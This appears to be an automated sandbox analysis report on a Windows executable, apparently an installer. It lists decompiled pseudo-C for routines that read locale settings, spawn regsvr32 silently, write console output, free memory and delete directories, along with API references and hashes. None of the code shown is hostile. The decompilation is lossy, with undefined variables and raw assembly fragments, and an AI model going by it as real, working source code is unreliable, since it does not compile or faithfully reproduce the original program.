                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                    • RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C806E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressCloseHandleModuleProc
                                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                    • API String ID: 4190037839-2401316094
                                                                    • Opcode ID: f7e7be658f0a955c462c647893507e18f8cdc3df8b481e5329b6105bcbfa9dbc
                                                                    • Instruction ID: b59d3067a1cffae51886ca0dc1f1740e66d40653876fb7099798d5cffc045aa9
                                                                    • Opcode Fuzzy Hash: f7e7be658f0a955c462c647893507e18f8cdc3df8b481e5329b6105bcbfa9dbc
                                                                    • Instruction Fuzzy Hash: 51214F34A04209AFDB10EAE5CC5AFFE7BE9FB48704F60486DA500F3681EE74AA45C755
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00624BA8, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E00624BA8(char __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v13;
				char _v84;
				void* _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				void* _t58;
				void* _t91;
				char _t92;
				intOrPtr _t110;
				void* _t120;
				void* _t123;

				_t118 = __edi;
				_v116 = 0;
				_v120 = 0;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_v8 = 0;
				_v12 = 0;
				_t120 = __ecx;
				_t91 = __edx;
				_v13 = __eax;
				_push(_t123);
				_push(0x624d3e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t123 + 0xffffff84;
				E005C745C( &_v8);
				_push(0x624d58);
				E005C4EA4(_v8,  &_v104);
				_push(_v104);
				_push(L"regsvr32.exe\"");
				E0040B550( &_v12, _t91, 3, __edi, _t120);
				if(_v13 != 0) {
					E0040B470( &_v12, 0x624d90);
				}
				_push(_v12);
				_push(L" /s \"");
				_push(_t120);
				_push(0x624d58);
				E0040B550( &_v12, _t91, 4, _t118, _t120);
				_t126 = _t91;
				if(_t91 == 0) {
					E0040B4C8( &_v112, _v12, L"Spawning 32-bit RegSvr32: ");
					E00616130(_v112, _t91, _t118, _t120);
				} else {
					E0040B4C8( &_v108, _v12, L"Spawning 64-bit RegSvr32: ");
					E00616130(_v108, _t91, _t118, _t120);
				}
				E00407760( &_v84, 0x44);
				_v84 = 0x44;
				_t58 = E0040B278(_v8);
				if(E0060C038(_t91, E0040B278(_v12), 0, _t126,  &_v100,  &_v84, _t58, 0, 0x4000000, 0, 0, 0) == 0) {
					E0060CE84(L"CreateProcess");
				}
				CloseHandle(_v96);
				_t92 = E00624AA4( &_v100);
				if(_t92 != 0) {
					_v128 = _t92;
					_v124 = 0;
					E004244F8(L"0x%x", 0,  &_v128,  &_v120);
					E005CD508(0x53,  &_v116, _v120);
					E00429008(_v116, 1);
					E004098C4();
				}
				_pop(_t110);
				 *[fs:eax] = _t110;
				_push(E00624D45);
				E0040A228( &_v120, 5);
				return E0040A228( &_v12, 2);
			}






















                                                                    0x00624ba8
                                                                    0x00624bb2
                                                                    0x00624bb5
                                                                    0x00624bb8
                                                                    0x00624bbb
                                                                    0x00624bbe
                                                                    0x00624bc1
                                                                    0x00624bc4
                                                                    0x00624bc7
                                                                    0x00624bc9
                                                                    0x00624bcb
                                                                    0x00624bd0
                                                                    0x00624bd1
                                                                    0x00624bd6
                                                                    0x00624bd9
                                                                    0x00624bdf
                                                                    0x00624be4
                                                                    0x00624bef
                                                                    0x00624bf4
                                                                    0x00624bf7
                                                                    0x00624c04
                                                                    0x00624c0d
                                                                    0x00624c17
                                                                    0x00624c17
                                                                    0x00624c1c
                                                                    0x00624c1f
                                                                    0x00624c24
                                                                    0x00624c25
                                                                    0x00624c32
                                                                    0x00624c37
                                                                    0x00624c39
                                                                    0x00624c60
                                                                    0x00624c68
                                                                    0x00624c3b
                                                                    0x00624c46
                                                                    0x00624c4e
                                                                    0x00624c4e
                                                                    0x00624c77
                                                                    0x00624c7c
                                                                    0x00624c93
                                                                    0x00624cb6
                                                                    0x00624cbd
                                                                    0x00624cbd
                                                                    0x00624cc6
                                                                    0x00624cd3
                                                                    0x00624cd7
                                                                    0x00624cdd
                                                                    0x00624ce0
                                                                    0x00624cee
                                                                    0x00624cfd
                                                                    0x00624d0c
                                                                    0x00624d11
                                                                    0x00624d11
                                                                    0x00624d18
                                                                    0x00624d1b
                                                                    0x00624d1e
                                                                    0x00624d2b
                                                                    0x00624d3d

                                                                    APIs
                                                                      • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00624D58,00000000, /s ",006D579C,regsvr32.exe",?,00624D58), ref: 00624CC6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseDirectoryHandleSystem
                                                                    • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                    • API String ID: 2051275411-1862435767
                                                                    • Opcode ID: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
                                                                    • Instruction ID: 4609d961d1e6a6c9b50d20a9c17260b7e2f4bf46ee5c2bafd069b1c5a14d41a0
                                                                    • Opcode Fuzzy Hash: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
                                                                    • Instruction Fuzzy Hash: 0B413F30A0061CABDB10EFE5D892ACDBBBAFF48304F51457EA504B7282DB746A05CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004062CC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E004062CC(int __eax, void* __ecx, void* __edx) {
				long _v12;
				int _t4;
				long _t7;
				void* _t11;
				long _t12;
				void* _t13;
				long _t18;

				_t4 = __eax;
				_t24 = __edx;
				_t20 = __eax;
				if( *0x6cf05c == 0) {
					_push(0x2010);
					_push(__edx);
					_push(__eax);
					_push(0);
					L0040529C();
				} else {
					_t7 = E0040A6C4(__edx);
					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
					_t11 =  *0x6c507c; // 0x40543c
					_t12 = E0040A6C4(_t11);
					_t13 =  *0x6c507c; // 0x40543c
					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
					_t18 = E0040A6C4(_t20);
					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
				}
				return _t4;
			}










                                                                    0x004062cc
                                                                    0x004062cf
                                                                    0x004062d1
                                                                    0x004062da
                                                                    0x0040633d
                                                                    0x00406342
                                                                    0x00406343
                                                                    0x00406344
                                                                    0x00406346
                                                                    0x004062dc
                                                                    0x004062e5
                                                                    0x004062f4
                                                                    0x00406300
                                                                    0x00406305
                                                                    0x0040630b
                                                                    0x00406319
                                                                    0x00406327
                                                                    0x00406336
                                                                    0x00406336
                                                                    0x0040634e

                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004062EE
                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 004062F4
                                                                    • GetStdHandle.KERNEL32(000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406313
                                                                    • WriteFile.KERNEL32(00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406319
                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 00406330
                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 00406336
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandleWrite
                                                                    • String ID: <T@
                                                                    • API String ID: 3320372497-2050694182
                                                                    • Opcode ID: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
                                                                    • Instruction ID: ee5667e1a227ecbea5375e2fa2ea65b47cf69c4a4a195d8f09788a9c4629ec5a
                                                                    • Opcode Fuzzy Hash: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
                                                                    • Instruction Fuzzy Hash: 5701A9A16046147DE610F3BA9C4AF6B279CCB0976CF10463B7514F61D2C97C9C548B7E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405D88, Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 91%
                                                                    			E00405D88(void* __eax, signed int __edi, void* __ebp) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				signed int __ebx;
				void* _t58;
				signed int _t61;
				signed int _t67;
				void _t70;
				int _t71;
				signed int _t78;
				void* _t79;
				signed int _t81;
				intOrPtr _t82;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t92;
				void* _t96;
				signed int _t99;
				void* _t103;
				intOrPtr _t104;
				void* _t106;
				void* _t108;
				signed int _t113;
				void* _t115;
				void* _t116;

				_t56 = __eax;
				_t89 =  *(__eax - 4);
				_t78 =  *0x6cf05d; // 0x0
				if((_t89 & 0x00000007) != 0) {
					__eflags = _t89 & 0x00000005;
					if((_t89 & 0x00000005) != 0) {
						_pop(_t78);
						__eflags = _t89 & 0x00000003;
						if((_t89 & 0x00000003) == 0) {
							_push(_t78);
							_push(__edi);
							_t116 = _t115 + 0xffffffdc;
							_t103 = __eax - 0x10;
							E00405764();
							_t58 = _t103;
							 *_t116 =  *_t58;
							_v48 =  *((intOrPtr*)(_t58 + 4));
							_t92 =  *(_t58 + 0xc);
							if((_t92 & 0x00000008) != 0) {
								_t79 = _t103;
								_t113 = _t92 & 0xfffffff0;
								_t99 = 0;
								__eflags = 0;
								while(1) {
									VirtualQuery(_t79,  &_v44, 0x1c);
									_t61 = VirtualFree(_t79, 0, 0x8000);
									__eflags = _t61;
									if(_t61 == 0) {
										_t99 = _t99 | 0xffffffff;
										goto L10;
									}
									_t104 = _v44.RegionSize;
									__eflags = _t113 - _t104;
									if(_t113 > _t104) {
										_t113 = _t113 - _t104;
										_t79 = _t79 + _t104;
										continue;
									}
									goto L10;
								}
							} else {
								if(VirtualFree(_t103, 0, 0x8000) == 0) {
									_t99 = __edi | 0xffffffff;
								} else {
									_t99 = 0;
								}
							}
							L10:
							if(_t99 == 0) {
								 *_v48 =  *_t116;
								 *( *_t116 + 4) = _v48;
							}
							 *0x6d1b7c = 0;
							return _t99;
						} else {
							return 0xffffffff;
						}
					} else {
						goto L31;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L14;
							}
							asm("pause");
							__eflags =  *0x6cf98d;
							if(__eflags != 0) {
								continue;
							} else {
								Sleep(0);
								__edx = __edx;
								__ecx = __ecx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									__edx = __edx;
									__ecx = __ecx;
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t14 = __edx + 0x14;
					 *_t14 =  *(__edx + 0x14) - 1;
					__eflags =  *_t14;
					__eax =  *(__edx + 0x10);
					if( *_t14 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							 *(__ebx + 0x14) = __eax;
						} else {
							__eax =  *(__edx + 0xc);
							__ecx =  *(__edx + 8);
							 *(__eax + 8) = __ecx;
							 *(__ecx + 0xc) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
								goto L20;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x6cf05d; // 0x0
						L31:
						__eflags = _t78;
						_t81 = _t89 & 0xfffffff0;
						_push(_t101);
						_t106 = _t56;
						if(__eflags != 0) {
							while(1) {
								_t67 = 0x100;
								asm("lock cmpxchg [0x6cfaec], ah");
								if(__eflags == 0) {
									goto L32;
								}
								asm("pause");
								__eflags =  *0x6cf98d;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									_t67 = 0x100;
									asm("lock cmpxchg [0x6cfaec], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L32;
							}
						}
						L32:
						__eflags = (_t106 - 4)[_t81] & 0x00000001;
						_t87 = (_t106 - 4)[_t81];
						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
							_t67 = _t81 + _t106;
							_t88 = _t87 & 0xfffffff0;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E004055DC(_t67);
							}
						} else {
							_t88 = _t87 | 0x00000008;
							__eflags = _t88;
							(_t106 - 4)[_t81] = _t88;
						}
						__eflags =  *(_t106 - 4) & 0x00000008;
						if(( *(_t106 - 4) & 0x00000008) != 0) {
							_t88 =  *(_t106 - 8);
							_t106 = _t106 - _t88;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E004055DC(_t106);
							}
						}
						__eflags = _t81 - 0x13ffe0;
						if(_t81 == 0x13ffe0) {
							__eflags =  *0x6cfaf4 - 0x13ffe0;
							if( *0x6cfaf4 != 0x13ffe0) {
								_t82 = _t106 + 0x13ffe0;
								E0040567C(_t67);
								 *((intOrPtr*)(_t82 - 4)) = 2;
								 *0x6cfaf4 = 0x13ffe0;
								 *0x6cfaf0 = _t82;
								 *0x6cfaec = 0;
								__eflags = 0;
								return 0;
							} else {
								_t108 = _t106 - 0x10;
								_t70 =  *_t108;
								_t96 =  *(_t108 + 4);
								 *(_t70 + 4) = _t96;
								 *_t96 = _t70;
								 *0x6cfaec = 0;
								_t71 = VirtualFree(_t108, 0, 0x8000);
								__eflags = _t71 - 1;
								asm("sbb eax, eax");
								return _t71;
							}
						} else {
							 *(_t106 - 4) = _t81 + 3;
							 *(_t106 - 8 + _t81) = _t81;
							E0040561C(_t106, _t88, _t81);
							 *0x6cfaec = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 0x10) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 8);
							 *(__edx + 0xc) = __ebx;
							 *(__edx + 8) = __ecx;
							 *(__ecx + 0xc) = __edx;
							 *(__ebx + 8) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}




























                                                                    0x00405d88
                                                                    0x00405d88
                                                                    0x00405d91
                                                                    0x00405d97
                                                                    0x00405e80
                                                                    0x00405e83
                                                                    0x00405f70
                                                                    0x00405f71
                                                                    0x00405f74
                                                                    0x00405814
                                                                    0x00405816
                                                                    0x00405818
                                                                    0x0040581d
                                                                    0x00405820
                                                                    0x00405825
                                                                    0x00405829
                                                                    0x0040582f
                                                                    0x00405833
                                                                    0x00405839
                                                                    0x00405855
                                                                    0x00405859
                                                                    0x0040585c
                                                                    0x0040585c
                                                                    0x0040585e
                                                                    0x00405866
                                                                    0x00405873
                                                                    0x00405878
                                                                    0x0040587a
                                                                    0x0040587c
                                                                    0x0040587f
                                                                    0x0040587f
                                                                    0x00405881
                                                                    0x00405885
                                                                    0x00405887
                                                                    0x00405889
                                                                    0x0040588b
                                                                    0x00000000
                                                                    0x0040588b
                                                                    0x00000000
                                                                    0x00405887
                                                                    0x0040583b
                                                                    0x0040584a
                                                                    0x00405850
                                                                    0x0040584c
                                                                    0x0040584c
                                                                    0x0040584c
                                                                    0x0040584a
                                                                    0x0040588f
                                                                    0x00405891
                                                                    0x0040589a
                                                                    0x004058a3
                                                                    0x004058a3
                                                                    0x004058a6
                                                                    0x004058b6
                                                                    0x00405f7a
                                                                    0x00405f7f
                                                                    0x00405f7f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405d9d
                                                                    0x00405d9d
                                                                    0x00405d9f
                                                                    0x00405da1
                                                                    0x00405e04
                                                                    0x00405e04
                                                                    0x00405e09
                                                                    0x00405e0d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405e0f
                                                                    0x00405e11
                                                                    0x00405e18
                                                                    0x00000000
                                                                    0x00405e1a
                                                                    0x00405e1e
                                                                    0x00405e23
                                                                    0x00405e24
                                                                    0x00405e25
                                                                    0x00405e2a
                                                                    0x00405e2e
                                                                    0x00405e38
                                                                    0x00405e3d
                                                                    0x00405e3e
                                                                    0x00000000
                                                                    0x00405e3e
                                                                    0x00405e2e
                                                                    0x00000000
                                                                    0x00405e18
                                                                    0x00405e04
                                                                    0x00405da3
                                                                    0x00405da3
                                                                    0x00405da3
                                                                    0x00405da3
                                                                    0x00405da7
                                                                    0x00405daa
                                                                    0x00405dd8
                                                                    0x00405dda
                                                                    0x00405def
                                                                    0x00405def
                                                                    0x00405ddc
                                                                    0x00405ddc
                                                                    0x00405ddf
                                                                    0x00405de2
                                                                    0x00405de5
                                                                    0x00405de8
                                                                    0x00405dea
                                                                    0x00405ded
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405ded
                                                                    0x00405df2
                                                                    0x00405df4
                                                                    0x00405df6
                                                                    0x00405df9
                                                                    0x00405e89
                                                                    0x00405e8c
                                                                    0x00405e8e
                                                                    0x00405e90
                                                                    0x00405e91
                                                                    0x00405e93
                                                                    0x00405e44
                                                                    0x00405e44
                                                                    0x00405e49
                                                                    0x00405e51
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405e53
                                                                    0x00405e55
                                                                    0x00405e5c
                                                                    0x00000000
                                                                    0x00405e5e
                                                                    0x00405e60
                                                                    0x00405e65
                                                                    0x00405e6a
                                                                    0x00405e72
                                                                    0x00405e76
                                                                    0x00000000
                                                                    0x00405e76
                                                                    0x00405e72
                                                                    0x00000000
                                                                    0x00405e5c
                                                                    0x00405e44
                                                                    0x00405e95
                                                                    0x00405e95
                                                                    0x00405e9d
                                                                    0x00405ea1
                                                                    0x00405ed8
                                                                    0x00405edb
                                                                    0x00405ede
                                                                    0x00405ee0
                                                                    0x00405ee6
                                                                    0x00405ee8
                                                                    0x00405ee8
                                                                    0x00405ea3
                                                                    0x00405ea3
                                                                    0x00405ea3
                                                                    0x00405ea6
                                                                    0x00405ea6
                                                                    0x00405eaa
                                                                    0x00405eae
                                                                    0x00405ef0
                                                                    0x00405ef3
                                                                    0x00405ef5
                                                                    0x00405ef7
                                                                    0x00405efd
                                                                    0x00405f01
                                                                    0x00405f01
                                                                    0x00405efd
                                                                    0x00405eb0
                                                                    0x00405eb6
                                                                    0x00405f08
                                                                    0x00405f12
                                                                    0x00405f40
                                                                    0x00405f46
                                                                    0x00405f4b
                                                                    0x00405f52
                                                                    0x00405f5c
                                                                    0x00405f62
                                                                    0x00405f69
                                                                    0x00405f6d
                                                                    0x00405f14
                                                                    0x00405f14
                                                                    0x00405f17
                                                                    0x00405f19
                                                                    0x00405f1c
                                                                    0x00405f1f
                                                                    0x00405f21
                                                                    0x00405f30
                                                                    0x00405f35
                                                                    0x00405f38
                                                                    0x00405f3c
                                                                    0x00405f3c
                                                                    0x00405eb8
                                                                    0x00405ebb
                                                                    0x00405ebe
                                                                    0x00405ec6
                                                                    0x00405ecb
                                                                    0x00405ed2
                                                                    0x00405ed6
                                                                    0x00405ed6
                                                                    0x00405dac
                                                                    0x00405dac
                                                                    0x00405dae
                                                                    0x00405db4
                                                                    0x00405db7
                                                                    0x00405dc0
                                                                    0x00405dc3
                                                                    0x00405dc6
                                                                    0x00405dc9
                                                                    0x00405dcc
                                                                    0x00405dcf
                                                                    0x00405dd2
                                                                    0x00405dd2
                                                                    0x00405dd4
                                                                    0x00405dd5
                                                                    0x00405db9
                                                                    0x00405db9
                                                                    0x00405db9
                                                                    0x00405dbb
                                                                    0x00405dbd
                                                                    0x00405dbe
                                                                    0x00405dbe
                                                                    0x00405db7
                                                                    0x00405daa

                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A,00000000), ref: 00405E1E
                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A), ref: 00405E38
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
                                                                    • Instruction ID: 71ad01a6e0dc675f4130d8d0918bf11407b14d9ec69c5e02b41b8aae26145368
                                                                    • Opcode Fuzzy Hash: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
                                                                    • Instruction Fuzzy Hash: 2871C031604A008FD715DB69C989B27BBD5EF85314F18C17FE888AB3D2D6B88941CF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00628E3C, Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E00628E3C(void* __eax, void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				char _v9;
				char _v16;
				char _v20;
				char _v24;
				void* _t44;
				intOrPtr _t50;
				void* _t51;
				void* _t65;
				void* _t71;
				void* _t76;
				intOrPtr _t88;
				signed int _t103;
				void* _t104;
				char _t106;
				void* _t109;
				void* _t122;

				_t122 = __fp0;
				_push(__ebx);
				_push(__esi);
				_v24 = 0;
				_v8 = __ecx;
				_t106 = __edx;
				_t76 = __eax;
				_push(_t109);
				_push(0x628fc2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t109 + 0xffffffec;
				_t103 = E0060C330(__eax, __edx, __eflags);
				if(_t103 == 0xffffffff || (_t103 & 0x00000010) == 0) {
					_v9 = 1;
					goto L18;
				} else {
					_v20 = _t106;
					_v16 = 0x11;
					E006163B4(L"Deleting directory: %s", _t76, 0,  &_v20, _t103, _t106);
					if((_t103 & 0x00000001) == 0) {
						L9:
						_t44 = E0060C664(_t76, _t106, _t117);
						asm("sbb eax, eax");
						_v9 = _t44 + 1;
						if(_v9 != 0) {
							L18:
							_pop(_t88);
							 *[fs:eax] = _t88;
							_push(E00628FC9);
							return E0040A1C8( &_v24);
						}
						_t104 = GetLastError();
						if(_v8 == 0) {
							__eflags = _a4;
							if(_a4 == 0) {
								L16:
								_v20 = _t104;
								_v16 = 0;
								E006163B4(L"Failed to delete directory (%d).", _t76, 0,  &_v20, _t104, _t106);
								goto L18;
							}
							_t50 = E00628C68(_a4, _t76, _t106, _t106);
							__eflags = _t50;
							if(_t50 == 0) {
								goto L16;
							}
							_t51 = E00429D18();
							__eflags = _t51 - 2;
							if(_t51 != 2) {
								goto L16;
							}
							_v20 = _t104;
							_v16 = 0;
							E006163B4(L"Failed to delete directory (%d). Will delete on restart (if empty).", _t76, 0,  &_v20, _t104, _t106);
							E00628D50(_t76, _t76, _t106, _t104, _t106);
							goto L18;
						}
						_v20 = _t104;
						_v16 = 0;
						E006163B4(L"Failed to delete directory (%d). Will retry later.", _t76, 0,  &_v20, _t104, _t106);
						E0040B29C();
						E0040B470( &_v24, _t106);
						E00610640(_v8, 0, _v24, _t122);
						goto L18;
					}
					_t115 = _t103 & 0x00000400;
					if((_t103 & 0x00000400) != 0) {
						L5:
						_t65 = E0060C6DC(_t76, 0xfffffffe & _t103, _t106, _t116);
						_t117 = _t65;
						if(_t65 == 0) {
							E00616130(L"Failed to strip read-only attribute.", _t76, _t103, _t106);
						} else {
							E00616130(L"Stripped read-only attribute.", _t76, _t103, _t106);
						}
						goto L9;
					}
					_t71 = E0060DFAC(_t76, _t76, _t106, _t106, _t115);
					_t116 = _t71;
					if(_t71 == 0) {
						E00616130(L"Not stripping read-only attribute because the directory does not appear to be empty.", _t76, _t103, _t106);
						goto L9;
					}
					goto L5;
				}
			}




















                                                                    0x00628e3c
